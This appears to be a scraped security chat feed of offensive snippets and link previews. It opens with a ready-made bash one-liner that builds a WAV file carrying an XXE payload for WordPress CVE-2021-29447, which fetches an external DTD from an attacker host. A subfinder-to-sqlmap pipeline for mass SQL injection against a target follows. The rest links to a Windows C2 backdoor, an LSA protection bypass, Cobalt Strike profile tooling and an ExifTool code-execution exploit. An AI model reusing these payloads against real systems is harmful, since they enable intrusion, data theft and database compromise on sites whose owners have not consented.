CVE-2021-29447 #WordPress XXE: you don't need a wave file to set iXML metadata! bash:
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://attacker/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://attacker/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
find sql injection
subfinder -d target | tee -a domains
cat domain | httpx | tee -a alive.txt
cat alive.txt | waybackurls | tee -a urls
gf sqli urls >> sqli
sqlmap -m sqli --dbs --batch
happy hacking
subfinder -d target | tee -a domains
cat domain | httpx | tee -a alive.txt
cat alive.txt | waybackurls | tee -a urls
gf sqli urls >> sqli
sqlmap -m sqli --dbs --batch
happy hacking
GitHub - Cr4sh/MicroBackdoor: Small and convenient C2 tool for Windows targets
https://github.com/Cr4sh/MicroBackdoor
https://github.com/Cr4sh/MicroBackdoor
GitHub
GitHub - Cr4sh/MicroBackdoor: Small and convenient C2 tool for Windows targets
Small and convenient C2 tool for Windows targets. Contribute to Cr4sh/MicroBackdoor development by creating an account on GitHub.
Bypassing LSA Protection in Userland – Sec Team Blog
https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland/
https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland/
GitHub - Porchetta-Industries/pyMalleableC2: Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and modify them programmatically.
https://github.com/Porchetta-Industries/pyMalleableC2
https://github.com/Porchetta-Industries/pyMalleableC2
GitHub
GitHub - byt3bl33d3r/pyMalleableC2: Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and…
Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and modify them programmatically. - byt3bl33d3r/pyMalleableC2
Weird Ways to Run Unmanaged Code in .NET - XPN InfoSec Blog
https://blog.xpnsec.com/weird-ways-to-execute-dotnet/
https://blog.xpnsec.com/weird-ways-to-execute-dotnet/
XPN InfoSec Blog
@_xpn_ - Weird Ways to Run Unmanaged Code in .NET
Recently I've been looking at the .NET CLR internals and wanted to understand what further techniques may be available for executing unmanaged code from the managed runtime. This post contains a snipped of some of the weird techniques that I found.
A tcpdump Tutorial with Examples — 50 Ways to Isolate Traffic | Daniel Miessler
https://danielmiessler.com/study/tcpdump/
https://danielmiessler.com/study/tcpdump/
Danielmiessler
A tcpdump Tutorial with Examples
tcpdump is the world's premier network analysis tool—combining both power and simplicity into a single command-line interface. This guide will show
ExifTool CVE-2021-22204 - Arbitrary Code Execution | devcraft.io
https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html
https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html
devcraft.io
ExifTool CVE-2021-22204 - Arbitrary Code Execution
Background
Hexacorn | Blog BYOT – Bring Your Own Telemetry
https://www.hexacorn.com/blog/2021/05/20/byot-bring-your-own-telemetry/
https://www.hexacorn.com/blog/2021/05/20/byot-bring-your-own-telemetry/